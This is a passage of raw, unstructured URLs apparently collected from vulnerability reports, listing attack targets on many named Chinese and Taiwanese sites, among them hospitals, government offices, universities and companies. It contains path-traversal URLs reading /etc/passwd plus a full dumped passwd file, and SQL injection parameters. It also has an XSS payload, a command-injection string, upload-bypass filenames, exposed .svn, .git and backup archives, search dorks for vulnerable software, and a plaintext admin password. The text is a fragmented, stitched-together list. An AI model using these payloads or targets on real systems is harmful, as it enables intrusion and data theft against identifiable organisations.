http://www.yzsyxx.net/oa/?lm=101169 http://www.czssx.com/oa/?lm=127 http://byxx.zledu.com/oa/?lm=488 http://www.ks2y.com/cms/JS.aspx?NRID=22&LMID=10 http://www.zjhl.org/cms/JS.aspx?NRID=471&LMID=212 http://www.hnzyy.cn/cms/JS.aspx?NRID=11176&LMID=10 http://www.fysrmyy.com/cms/JS.aspx?NRID=11176&LMID=10 http://www.zjqhyy.com/cms/JS.aspx?NRID=11177&LMID=15 ftp://202.103.209.125 cp.wybu.cn/csy/jl_admin/Admin_List.php?action=add http://t9.go2oa.com/t9/core/frame/webos/index.jsp http://t9.go2oa.com/t9/t9/core/funcs/email/act/T9InnerEMailAct/sendMailAll.act http://www.fanwe.com/dc https://www.shfft.com/proof/view/100000000002/2015031410008798xx.png http://www.zjqhyy.com/cms/GuestBookAdd.aspx?LX=4&LMID=58 http://www.zjhl.org/cms/GuestBookAdd.aspx?LX=3&LMID=58 http://www.zjkq.com.cn/cms/GuestBookAdd.aspx?LX=1&LMID=48 http://www.z2hospital.com/cms/GuestBookAdd.aspx?LX=4&LMID=58 http://www.ks2y.com/cms/GuestBookAdd.aspx?LX=4&LMID=58 http://www.42trip.com/qa/home.do是个类似知乎那样的专业问答社区加上活动功能,看了下做的还不错,但是这个社区存在大量的 http://222.210.127.204:8081 http://182.140.244.244/是个rhel默认页面,说明没有改配置,那么web目录就在默认的/var/www/html/下面 http://www.wzhospital.com/news.asp?id=2999 http://esci.xmu.edu.cn/news/content.php?web=news&id=93,存在问题的参数为id。 http://221.1.104.11:8011/OperateCertify/LandCancelAuditShowtown1.aspx?id= http://221.1.104.11:8011/OperateCertify/LandCancelAuditShowtown.aspx?id= http://221.2.171.59:8300/OperateCertify/LandCancelAuditShowtown1.aspx?id= http://221.2.171.59:8300/OperateCertify/LandCancelAuditShowtown.aspx?id= http://demo.inongyou.cn/OperateCertify/LandCancelAuditShowtown1.aspx?id= http://demo.inongyou.cn/OperateCertify/LandCancelAuditShowtown.aspx?id= http://rctdlz.cn/OperateCertify/LandCancelAuditShowtown1.aspx?id= http://rctdlz.cn/OperateCertify/LandCancelAuditShowtown.aspx?id= http://60.2.214.118:8088/OperateCertify/LandCancelAuditShowtown1.aspx?id= http://60.2.214.118:8088/OperateCertify/LandCancelAuditShowtown.aspx?id= http://121.17.2.52/OperateCertify/LandCancelAuditShowtown1.aspx?id= http://121.17.2.52/OperateCertify/LandCancelAuditShowtown.aspx?id= http://61.186.154.210:8088/OperateCertify/LandCancelAuditShowtown1.aspx?id= http://61.186.154.210:8088/OperateCertify/LandCancelAuditShowtown.aspx?id= http://www.gztv.com/vod/v99657.shtml http://www.600683.com/hrview1.asp?id=42 http://www.600683.com/test.asp http://www.600683.com/admin/filemanage.asp?id=1&d_viewmode=list&dir=../ http://mobsupport.zte.com.cn/EAGENT/ https://register.nrcc.com.cn/EnterpriseManage/Login.aspx www.mzga.gov.cn:8088/getTopSurvey_survey.action http://58.57.35.3:8091/pic/ http://tv.tcl.com/tvs/checkfrontLogin.do http://tvs/toFronthome.action http://tvs.tcl.com/tvs/redirectfrontLogin.action http://tvs.tcl.com/L.jsp http://www.wscec.com/pages/details.asp?id=178 http://pc.bnu.edu.cn:8080/jspx/main.action http://hotel.elong.com/publishcomment?ordernum=XXXX http://www.smcity.cn/admin/qiaocui.html http://igotone.zj.chinamobile.com:81/acwsui/pages/login.htm?sessionId=Gz7DHNhfq9elpk8sOFVNjfY http://www.eastpacific.com.cn/www.rar google:inurl:ReadBigClassmbNews.asp?id= http://www.myyouthbra.com/ReadBigClassmbNews.asp?id=220 http://www.djcfsb.com/readbigclassmbnews.asp?id=225 http://www.lkggcl.com/ReadBigClassmbNews.asp?id=92 http://cp01.cn/ReadBigClassmbNews.asp?id=224 http://www.oywine.com/ReadBigClassmbNews.asp?id=219 http://intheloop.mcdonalds.com.cn/readme.aspx http://intheloop.mcdonalds.com.cn/sendpass.aspx http://122.225.53.6/ http://www.zhuna.cn/so/ajRoom.asp?rid=1 http://www.zhuna.cn/so/ajRoom.asp?rid=1 http://www.zhuna.cn/so/ajRoom.asp?rid=1 http://sz.cqkyaq.com:122/default.asp http://www.ncdlaq.com:188/default.asp http://112.124.10.78:132/default.asp http://42.121.90.111:132/default.asp com:122 http://sz.cqkyaq.com:122 http://icp.gwbnsh.net.cn/images/photo//201503/d05902192dcddfbdd2f8b5d94481cf16.jpg/a.php http://icp.gwbnsh.net.cn/robots.txt/%20\0.php http://icp.gwbnsh.net.cn/robots.txt/a.php http://tp1.znimg.com/v5/images/map/images.php?hid=152589 http://cahkbs.ruc.edu.cn/member/myinfo.jsp?act=edit http://test.cmseasy.cn/celive/include/config.inc.php http://101.95.48.68/home/Default.aspx http://www.jxds.gov.cn/portalV3/site/site/portal/jx/content_index.portal[contentId=268734][categoryId=3999][siteName=jx][categoryCode=001027001006002 http://baike.1688.com/doc/view-d22569261.html http://www.nacao.org.cn/ http://www.yodo1.com.cn/ http://www.yodo1.cn http://yodo1.cn/wp-content/plugins/hello.php http://yodo1.cn/.git/config http://222.82.232.181:88/more.php?ks=1&lm=2 http://221.232.136.62/pm/ http://www.nhfpc.gov.cn/ inurl:ReadArticlemb.asp?id= inurl:ReadBigClassmb.asp?id= inurl:ReadBigClassmbNews.asp?id= http://expteach.gzhu.edu.cn/OpenTimsUI/STUMODEL/StuBookExpCell.aspx?codeID=9231&syxs=3&SYMC=%b5%e7%d7%d3%ba%c9%d6%ca%b1%c8%b5%c4%b2%e2%b6%a8&xn=2015&xq=1 http://www.zzyedu.org/Template/kclass.asp?Class1ID=22&page=2 http://www.jxzx.com.cn/ http://**.**.**/console http://**.**.**/console/ http://**.**.**/console/ http://**.**.**/console/ http://**.**.**/console/ http://**.**.**/console/新乡市公安消防支队_ http://**.**.**/console吉林消防办事直通车_ http://**.**.**/console辽宁总队办事直通车_ http://**.**.**/console三明市消防服务大厅_ http://**.**.**/console/ http://**.**.**/console福建省公安厅消防服务大厅_ http://www.ek21.com http://www.robam.com/minisitea7/newsinfo.php?news_id=1113 http://stats.spb.gov.cn/ http://stats.spb.gov.cn http://my.zol.com.cn/app/app.php?aid=6&userid=Pledger&c=book&m=my&url=%00../../../../../../../../etc/passwd http://www.cdtlgcxx.com:2110 http://jwmis.dzvtc.edu.cn http://jwgl.lynu.edu.cn http://220.167.53.63:81 http://jw.sxjgxy.edu.cn http://djyjw.sicau.edu.cn http://jys.zjedu.org/admin/admin.aspx https://vendor.wanda.cn/ https://vendor.wanda.cn/tender/trace.axd https://vendor.wanda.cn/tender/ http://app.clubwanda.com.cn/wanda/ http://221.1.104.11:8011/OperateCertify/LandChangeAuditShow1.aspx?id= http://221.1.104.11:8011/OperateCertify/LandChangeAuditShow.aspx?id= http://221.2.171.59:8300/OperateCertify/LandChangeAuditShow1.aspx?id= http://221.2.171.59:8300/OperateCertify/LandChangeAuditShow.aspx?id= http://demo.inongyou.cn/OperateCertify/LandChangeAuditShow1.aspx?id= http://demo.inongyou.cn/OperateCertify/LandChangeAuditShow.aspx?id= http://rctdlz.cn/OperateCertify/LandChangeAuditShow1.aspx?id= http://rctdlz.cn/OperateCertify/LandChangeAuditShow.aspx?id= http://60.2.214.118:8088/OperateCertify/LandChangeAuditShow1.aspx?id= http://60.2.214.118:8088/OperateCertify/LandChangeAuditShow.aspx?id= http://121.17.2.52/OperateCertify/LandChangeAuditShow1.aspx?id= http://121.17.2.52/OperateCertify/LandChangeAuditShow.aspx?id= http://61.186.154.210:8088/OperateCertify/LandChangeAuditShow1.aspx?id= http://61.186.154.210:8088/OperateCertify/LandChangeAuditShow.aspx?id= http://gh.cdyee.com/admin.php http://www.jsxz.lss.gov.cn/admin http://www.bjsasc.com//usermanage/register/index.asp http://221.1.104.11:8011/OperateCertify/LandChangeAuditShowtown.aspx?id= http://221.2.171.59:8300/OperateCertify/LandChangeAuditShowtown.aspx?id= http://demo.inongyou.cn/OperateCertify/LandChangeAuditShowtown.aspx?id= http://rctdlz.cn/OperateCertify/LandChangeAuditShowtown.aspx?id= http://60.2.214.118:8088/OperateCertify/LandChangeAuditShowtown.aspx?id= http://121.17.2.52/OperateCertify/LandChangeAuditShowtown.aspx?id= http://61.186.154.210:8088/OperateCertify/LandChangeAuditShowtown.aspx?id= http://www.gdsto.com.cn/admin/eWebEditor/db/ewebeditor.mdb http://www.gdsto.com.cn/admin/eWebEditor/admin_login.asp http://www.gjb.com.cn/actionServer.php?action=downfile&fname=../index.php&ei=3kQGVe6qC4WAzAPZwYG4CQ&usg=AFQjCNH2QPP-ZmMTHmJtWQtCXVUyViUNAQ&bvm=bv.88198703,d.bGQ&cad=rjt http://www.cape.com.cn/ecshop/admin/index.php http://www.cape.com.cn/capemanage/index.php http://cata.cape.com.cn/dede/login.php http://zbbz.cape.com.cn:8080/ http://219.232.237.69/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://219.232.237.69/resin-doc/viewfile/?contextpath=/&servletpath=&file=/WEB-INF/web.xml http://www.nits.org.cn/getIndex.req?action=quary&req=modulenvpromote&id=1218&type=0&moduleId=467&sid=35 www.magtech.com.cn http://118.145.16.212/Jwk_ghyyj/CN/volumn/home.shtml http://118.145.16.212/journalx_ghyyj/secure/admin/fckeditor/editor/filemanager/upload/simpleuploader?Type=File http://worldcup.suning.com/WorldCupGameService/gotoWorldCup.action http://cms.joy.cn/.svn/entries https://github.com/liuxiong332/node-viewpoint/blob/44221afc87be200220d66e1fa86f938004769d8d/lib/node-viewpoint.coffee url:http://star.koowo.com/star/userlist.txt http://t.cn/RwkB0Dz http://fx.fj.189.cn/.svn/entries http://www.ltpower.net/ inurl:Content.Asp inurl:showinfo http://222.184.102.170/ news.07073.com/plus/digg_ajax9.php?type=&id=1071264 http://xssec.cc/VdeTjC?1426492666 http://kf.sdo.com/kf/zz.aspx?url=zz.aspx(战争世界): http://kf.sdo.com/kf/News.aspx: http://kf.sdo.com/kf/aion.aspx?url=aion.aspx(永恒之塔): http://kf.sdo.com/kf/lzg.aspx?url=lzg.aspx(龙之谷): http://kf.sdo.com/kf/mir2.aspx?url=mir2.aspx(热血传奇): http://222.52.151.121:8081/login.asp http://61.235.191.149:8081/login.asp http://221.176.225.174:8081/login.asp http://120.194.234.212:8081/login.asp http://120.209.10.202:8081/login.asp http://www.ltpower.net/ inurl:Content.Asp inurl:showinfo http://jpkc.fimmu.com/sqhl/search.asp?pageno=3&keywords=1 http://jpkc.zzti.edu.cn/C202/search.asp?pageno=3&keywords=1 http://www.gzvtc.cn/%E7%9F%B3%E5%8C%96%E5%B7%A5%E7%A8%8B%E7%B3%BB/search.asp?pageno=3&keywords=1 http://ghmicr.jnu.edu.cn/search.asp?pageno=3&keywords=1 http://www.zjyy.com.cn/zyk/search.asp?pageno=3&keywords=1 http://webimg.br.baidu.com/odin/201410/5a0df6833f6bddadbf651e465e681f68.jpg转发了出来。形成了ssrf http://wap.ftchinese.com/.svn/entries http://wap.ftchinese.com/FTC_MBA.zip inurl://///?/tudou./@password http://www.beequick.cn/登录,提供手机验证。可查询订单信息等。 www.beequick.cn http://shop.zhe800.com/users/addresses http://www.cba.gov.cn/cbastats/teamdetail.aspx?id=Te010 http://www.yiban.cn/project/wangluowenhua/sort-culture.php?cateid=3&search_name=1357919988 http://58.68.252.68:9000/ http://117.40.138.30:9000/ http://116.1.249.151:9000/ http://222.223.141.16:9000/ http://218.24.171.28:9000/ http://61.184.36.220:9000/ http://117.40.138.30:9000/ user:admin password:adminadmin@@ http://kdjyxk.spb.gov.cn/admin/system/getPass.jsp inurl:until/select_sbbh.jsp inurl:subject_info.jsp?up_lmbh http://zsb.nwpu.edu.cn/phpmyadmin/ http://www.eyw.edu.cn/www/tjpumba/listnews.php?typeid=18 http://wu.scbb.pkusz.edu.cn/wdsp/getResults?id=4224 http://shouji.baidu.com/soft/item?docid=7550690&from=web_alad_6 http://116.213.222.114/ http://116.213.222.114/javascript/uploadify-v2.1.4/uploadify.php http://dd.xdcms.cn/index.php?m=member&f=edit http://www.51openos.com/ http://www.1ypg.com/ inurl:help/genuinetwo.html http://**.**.**/_ http://**.**.** http://**.**.**/_ http://**.**.**/_ http://**.**.** http://**.**.**/ http://manyou.189.cn/ http://manyou.189.cn/1123123.jsp https://221.13.108.150/ www.hhws.gov.cn/upload_load/info_download.jsp?down_URL=/upload_load/info_download.jsp http://bizhi.360.cn/showWallPaper.html?kw=%810%C90%810%9C2&imgurl=%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C%3CScript%3Ealert%28%22by:0x%2080%22%29%3C/script%3E%3C inurl:openwebmail下,大概有好几十页都是该邮箱系统的登录页面,如: http://hlc.edu.tw/cgi-bin/owmmdirdb/openwebmail.pl http://tea.ntue.edu.tw/cgi-bin/owmmdir/openwebmail.pl http://mail.meiho.edu.tw/cgi-bin/owmmdir2/openwebmail.pl http://webmail.tatung.com/cgi-bin/owmmdir2/openwebmail.pl http://gautai.com.tw/cgi-bin/openwebmail/openwebmail.pl http://ms2.kntech.com.tw/cgi-bin/openwebmail/openwebmail.pl http://ftkr.com.tw/ http://mail.tajen.edu.tw/cgi-bin/openwebmail/openwebmail.pl http://ee.ncku.edu.tw/cgi-bin/owmmdir/openwebmail.pl http://mail.tccn.edu.tw/cgi-bin/openwebmail/openwebmail.pl intitle:ZDSOFT.NET信息发布平台 www.lzedu.cn:8080/cnet/system/login.jsp www.lzedu.cn:8080 inurl:csccmise http://www.bluedragon.com.cn/csccmise/cczp.asp?xhid=33208 http://www.cclcfs.com:81/csccmise/cczp.asp?xhid=33208 http://122.227.235.122/csccmise/cczp.asp?xhid=33208 http://nbrywl.com/csccmise/cczp.asp?xhid=33208 http://61.175.235.81:88/csccmise/cczp.asp?xhid=33208 http://60.190.16.166/csccmise/cczp.asp?xhid=33208 http://www.nhcc-cn.com/csccmise/cczp.asp?xhid=33208 http://www.bluedragon.com.cn/csccmise/cczp.asp?xhid=33208为例: http://59.61.82.170/webmt/SysLogin.aspx https://219.143.245.230 https://219.143.245.230/console/ http://apil.ruc.edu.cn/manage/Login.asp http://nc.youku.com/index_QSideToolJSONP?function[]=getUserInfo&callback[]=SideTool.showUserMsgCallback http://nc.youku.com/index_QSideToolJSONP?function[]=getUserBasicInfo&callback[]=SideTool.upUserImg http://nc.youku.com/index_QSideToolJSONP?function[]=viewRecord&callback[]=SideTool.showRecordListCallback http://nc.youku.com/index_QSideToolJSONP?function[]=getNoticeInfo&callback[]=SideTool.showNoticeListCallback www.eyougame.com http://msf.cq119.gov.cn:8083/cqcms/index.jsp http://113.108.129.142/dlarea/download.php?fn=../../../../../../../../../../etc/passwd&bid=74&bname=%E5%BA%B7%E4%BD%B3&mid=1633&mname=D580 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin samba:x:500:500::/home/samba:/bin/bash zhanghs:x:501:501::/home/zhanghs:/bin/bash baixf:x:502:502::/home/baixf:/bin/bash splunk:x:503:503:Splunk Server:/opt/splunkforwarder:/bin/bash esets:x:101:104::/home/esets:/bin/false monitor:x:504:504::/home/monitor:/bin/bash http://www.yiban.cn/admin/index/login http://www.pgyer.com http://www.pgyer.com/app/add http://www.pgyer.com/B9v6 http://m.tuan.duba.com/ http://114.112.68.203/ http://tuan.duba.com http://114.112.68.203/?city=1 http://114.112.68.203/?city=1 http://cache.baiducontent.com/c?m=9d78d513d98207fc18fa950e1a16a0711824d93e61928d027ea48448e4735a31163bbcac2753514280856b6770e8080baaae6d33711421c78cc8ff5ddccbd462699c60742e13dc0754910eaeb85b388066c31afeaf6ebee7ad77ceb9d2a48e090cd7124329c0edcc1b57549434b15226e3d1df0253&p=882a9544dc8502fe12aec7710f5d8c&newp=c357c216d9c111a058ec9e2b614c9f231610db2151ddd615&user=baidu&fm=sc&query=http%3A//star%2Ekoowo%2Ecom/star/userlist%2Etxt&qid=b6347d18000072f5&p1=1 http://bbs.yjbys.com/bbs.rar http://www.china-safety.org/china-safety.org.zip http://218.94.128.133/zl/ www.sxycga.com/_ www.sxycg***** http://www.hvtol.com/Product/ http://www.hvtol.com/success/ http://www.gmshouji.com/User/User_ShopUserOrder.asp?Action=Edit&id=1 http://www.sdyoulaile.com/User/User_ShopUserOrder.asp?Action=Edit&id=2 http://222.172.223.253:8080/Manager/Login.aspx http://qhdm.asmz.gov.cn/NEWS/newshow.aspx?id=547 http://xgfx.hb.189.cn/?admin/ http://221.1.104.11:8011/OperateCertify/LandCancelAuditShowtownQ.aspx?id= http://221.1.104.11:8011/OperateCertify/LandCancelAuditShowtown1print.aspx?id= http://221.2.171.59:8300/OperateCertify/LandCancelAuditShowtownQ.aspx?id= http://221.2.171.59:8300/OperateCertify/LandCancelAuditShowtown1print.aspx?id= http://demo.inongyou.cn/OperateCertify/LandCancelAuditShowtownQ.aspx?id= http://demo.inongyou.cn/OperateCertify/LandCancelAuditShowtown1print.aspx?id= http://rctdlz.cn/OperateCertify/LandCancelAuditShowtownQ.aspx?id= http://rctdlz.cn/OperateCertify/LandCancelAuditShowtown1print.aspx?id= http://60.2.214.118:8088/OperateCertify/LandCancelAuditShowtownQ.aspx?id= http://60.2.214.118:8088/OperateCertify/LandCancelAuditShowtown1print.aspx?id= http://121.17.2.52/OperateCertify/LandCancelAuditShowtownQ.aspx?id= http://121.17.2.52/OperateCertify/LandCancelAuditShowtown1print.aspx?id= http://61.186.154.210:8088/OperateCertify/LandCancelAuditShowtownQ.aspx?id= http://61.186.154.210:8088/OperateCertify/LandCancelAuditShowtown1print.aspx?id= http://donghua.u17.com/ http://www.mojing8.com/compare.aspx?ids=0 http://www.shop0516.com/compare.aspx?ids=0 http://www.echinasport.com/compare.aspx?ids=0 http://www.superlover.cn/compare.aspx?ids=0 http://www.guanshitong.com/compare.aspx?ids=0 http://www.subilong.com/compare.aspx?ids=0 http://www.cs929.com/compare.aspx?ids=0 http://www.greeni.cn/compare.aspx?ids=0 http://www.glorybooks.com.cn/compare.aspx?ids=0 http://shop.cacs.net.cn/compare.aspx?ids=0 http://ggzy.jzcfxxw.gov.cn:8080/news/notice/one/index.jspx?id=20075 http://116.11.253.53/admin/mainFrame.aspx http://www.ztesoft.com/index.php?ac=form&fgid=1&at=list http://www.hnrbi.com/kcsjy/index.jsp http://www.hnrbi.com/kcsjy/cms/website/04/template_div/subcollist.jsp?oldcid=3356 http://www.haidao.la/ http://demo.haidao.la/index.php inurl:rapid.jsp?websiteid http://www.zygs.com/zygs/cms/index/template/rapid.jsp?websiteid=797&searchType=f_subject&columnids=-1&searchStr=a http://www.hnrbi.com/kcsjy/cms/index/template/rapid.jsp?nextPage=20&websiteid=737&searchType=F_SUBJECT&searchStr=&beginDate=null&endDate=null&columnids=3505,3517,3475,3406,3355,3370,3365,3356,3375,3518,3506,3373,3425,3407,3376,3364,3377,3395,3362,3507,3358,3367,3519,3369,3408,3372,3508,3374,3371,3368,3363,3520,3485,3409,3379,3378,3426,3380,3509,3410,3510,3385,3465,3411,3511,3405,3415,3512,3416,3513,3514,3445,3515,3495,3516,3521 http://www.yrihr.com.cn/hky/cms/index/template/rapid.jsp?websiteid=32&searchType=f_subject&columnids=-1&searchStr= http://www.hngsdc.com/hngsdc/cms/index/template/rapid.jsp?nextPage=19&websiteid=717&searchType=f_subject&searchStr=&beginDate=null&endDate=null&columnids=4256,4268,3247,4278,3245,3298,4283,4385,3299,3296,3246,3502,4279,4386,4269,4267,4285,4280,3504,3248,4276,4265,4281,4255,4395,4335,3500,4272,4246,4282,3385,4315,4325,4345,4355,4365,4375 http://www.ayx.gov.cn/ayx/cms/website/ayx/index/rapid.jsp?websiteid=82&searchType=f_subject&columnids=-1&searchStr=a&selectwzid=0 http://61.163.228.163/kcsjy/cms/index/template/rapid.jsp?nextPage=20&websiteid=737&searchType=F_SUBJECT&searchStr=a&beginDate=null&endDate=null&columnids=3505,3517,3475,3406,3355,3370,3365,3356,3375,3518,3506,3373,3425,3407,3376,3364,3377,3395,3362,3507,3358,3367,3519,3369,3408,3372,3508,3374,3371,3368,3363,3520,3485,3409,3379,3378,3426,3380,3509,3410,3510,3385,3465,3411,3511,3405,3415,3512,3416,3513,3514,3445,3515,3495,3516,3521 http://218.28.41.15/hky/cms/index/template/rapid.jsp?nextPage=6&websiteid=32&searchType=f_subject&searchStr=&beginDate=null&endDate=null&columnids=87,1233,1193,1272,1200,1203,1230,62,78,60,1211,44,1224,1227,1221,67,11,1217,48,54,57,81,63,61,58,21,88,82,79,68,55,45,1234,73,1231,1228,1225,1222,1218,1212,1204,1194,1213,80,1229,89,1220,46,1223,83,1235,1232,59,1205,56,64,69,1195,1226,22,47,84,65,70,90,1196,1206,1214,1274,85,1197,1215,66,1207,24,71,1198,86,1216,72,1208,25,1199,1209,26,74,27,75,28,1201,76,29,30,77,31,33,34,35,36,37,38,39,40,41,42,43,91,1192,1202,1210,1252,1262,1282,1292 http://hngsdc.com/hngsdc/cms/index/template/rapid.jsp?nextPage=12&websiteid=717&searchType=f_subject&searchStr=&beginDate=null&endDate=null&columnids=4256,4268,3247,4278,3245,3298,4283,4385,3299,3296,3246,3502,4279,4386,4269,4267,4285,4280,3504,3248,4276,4265,4281,4255,4395,4335,3500,4272,4246,4282,3385,4315,4325,4345,4355,4365,4375 http://218.29.75.230/hngsdc/cms/index/template/rapid.jsp?websiteid=717&nextPage=22&searchType=f_subject&searchStr=&beginDate=null&endDate=null&columnids=4256,4268,3247,4278,3245,3298,4283,4385,3299,3296,3246,3502,4279,4386,4269,4267,4285,4280,3504,3248,4276,4265,4281,4255,4395,4335,3500,4272,4246,4282,3385,4315,4325,4345,4355,4365,4375 http://appweb.yaya888.com/activity.php?aid=38 http://www.ljggzy.gov.cn/home/news/detail.asp?subjectid=002009005&id=189 http://wsbs.gzagri.gov.cn/xzsp/index/findOneMessage.do?mid=230 http://114.251.243.19/ http://114.251.243.19/UploadFile/GuestPhoto/20150317110716aspx.aspx http://suggestion.baidu.com/su;/1.bat;?wd=&cb=calc||&sid=1440_2031_1945_1788&t=1362056239875 http://www.xxt.cn//xmlrpc http://file.sywg.com:8888/ http://demo.dbshop.net/ http://yifushoes.com http://www.asnei.com http://55techan.cn http://woyyg.com http://dg.dan2dan.ne0 http://shengqianqu.com/ https://www.yiji.com/yjf/common/backpwd.htm) http://www.lzsnyj.gov.cn http://www.lzsnyj.gov.cn/TXT_Detail.asp?sAction=%D5%FE%B9%A4%D4%B0%B5%D8&ID=468 http://mhz.pw/game/discuz/xss.php?domain=bbs.games.sina.com.cn http://www.buaapress.com.cn/bookshop.php?booktypeid=53&pmenuid=2 http://www.buaapress.com.cn/admin/index.php ftp://202.99.109.158 http://www.worldeyes.net/ http://ggzy.llcftxw.gov.cn/news/notice/one/index.jspx?id=3734 http://tool.link3c.com http://tool.link3c.com/ http://www.worldeyes.net/ http://www.worldeyes.net/ http://**.**.**/hrmgrsys/hrAction!login.action_ www.ngga.gov.cn:8080/hrmgrsys/test.txt_ http://icc.hnair.com/ http://icc.hnair.com/5107/upload/screenImagesSave.php?filename=wooyun.php.a;.7z http://icc.hnair.com/data/files/20150317/wooyun.php.a;.7z URL:http://www.scti.cn/test/showmessageinfo.aspx?id=906 http://www.scti.cn/test/productdetailinfo.aspx?id=17(参数id) http://www.scti.cn/test/listinfo.aspx?sourse=1&type=3(参数type) http://221.204.249.120:8080/sx_jtzjj_oa/syslogin.action http://221.204.249.120:8080/sx_jtzjj_oa/test.txt http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://xw.yaya888.com/app/priceline/data.php?gid=5876&code=1426571413 http://club.lenovo.com.cn/ http://club.lenovo.com.cn/lefen/gift/pub/shdz.php http://mhz.pw/game/discuz/xss.php?domain=bbs.u.360.cn http://syxx.yiban.cn:80/admin/.svn/entries http://swsxx.yiban.cn:80/admin/.svn/entries http://spa.yiban.cn:80/bbs_foot_link/.svn/entries http://spa.yiban.cn:80/blog/.svn/entries http://spa.yiban.cn:80/eclass/.svn/entries http://spa.yiban.cn:80/function/.svn/entries http://spa.yiban.cn:80/weibo/.svn/entries http://spa.yiban.cn:80/admin/.svn/entries http://shyyxx.yiban.cn:80/admin/.svn/entries http://shsmly.yiban.cn:80/admin/.svn/entries http://shkg.yiban.cn:80/bbs_foot_link/.svn/entries http://shkg.yiban.cn:80/blog/.svn/entries http://im.gjzq.cn:9090/login.jsp http://glj.zmdjtj.gov.cn/news.asp?id=953 http://www.japan.ntu.edu.tw/subject/news_sql.php?id=14加上AND1=1,AND www.daling.com http://www.daling.com:80/ www.daling.com http://114.112.82.54/bak/gotologin.box http://61.168.11.39/wwwroot.rar http://campus.chinahr.com/ http://campus.chinahr.com/2015/pages/ikongjian/jobs.asp?did=303311000002 http://59.51.130.42/testDown1.php?Name=../testDown1.php http://error.zhanchengkeji.com/uc_server http://city2012.house.sina.com.cn/api/luck_draw.php?type=prizelist&ty=1 http://city2012.house.sina.com.cn/api/luck_draw.php?type=prizelist&ty=1%20%20AND%203*2*1=6%20AND%201=2&action=1&callback=jQuery16107100072728935629_1426584902676&_=1426584905502 http://chengde.mop.com,登录后访问以下POC,等待2秒触发: http://mhz.pw/game/discuz/xss.php?domain=chengde.mop.com http://mhz.pw/game/discuz/xss.php?domain=fuzhou.mop.com http://mhz.pw/game/discuz/xss.php?domain=xiamen.mop.com http://mhz.pw/game/discuz/xss.php?domain=zhuhai.mop.com http://mhz.pw/game/discuz/xss.php?domain=wuhan.mop.com http://mhz.pw/game/discuz/xss.php?domain=yuncheng.mop.com http://mhz.pw/game/discuz/xss.php?domain=shiyan.mop.com inurl:site_item_list_4.php www.ymca-tainan.org.tw/nursery/site_item_content_4.php?site_map_item_id=754 www.taccn.org.tw/site_item_list_4.php?site_map_item_id=4 www.rha.org.tw/site_item_list_4.php?site_map_item_id=23 www.ncku-tn.tw/site_item_content_4.php?site_map_item_id=42 www.etan.com.tw/huide_hosp/big5/site_item_content_4.php?site_map_item_id=347 http://www.piaoyou.org/case_web.htm http://nj.bicpa.org.cn/excel/excel!doOfficialExportExcel.action http://lab.njnu.edu.cn/fjlist.asp?id=87 http://down.chinaz.com/soft/35447.htm http://www.edayshop.com/ inurl:sp.asp?sx= http://freetuan.net//admins/upfile_flash.asp http://www.epqy.cn/dgt//admins/upfile_flash.asp http://www.baidurx.com/shspoh/admins/upfile_flash.asp http://www.pncsdq.com/admins/upfile_flash.asp http://o.smpx.com/admins/upfile_flash.asp http://www.shfdj.com//admins/upfile_flash.asp http://mall.hnllg.com///admins/upfile_flash.asp http://www.qzdxc.com//admins/upfile_flash.asp http://www.10-10-10.cn/fx/admins/upfile_flash.asp http://www.hanibabyppo.com/tuangou/admins/upfile_flash.asp http://www.jmqxl.com/admins/upfile_flash.asp http://mhz.pw/game/discuz/xss.php?domain=bbs.mhzx2.wanmei.com http://mhz.pw/game/discuz/xss.php?domain=xxxx http://bbs.nw.wanmei.com http://bbs.mhsd.wanmei.com http://bbs.chibi.wanmei.com http://bbs.rwpd.wanmei.com http://bbs.kdxy.wanmei.com http://bbs.d.wanmei.com http://bbs.sg.wanmei.com http://bbs.seiya.wanmei.com 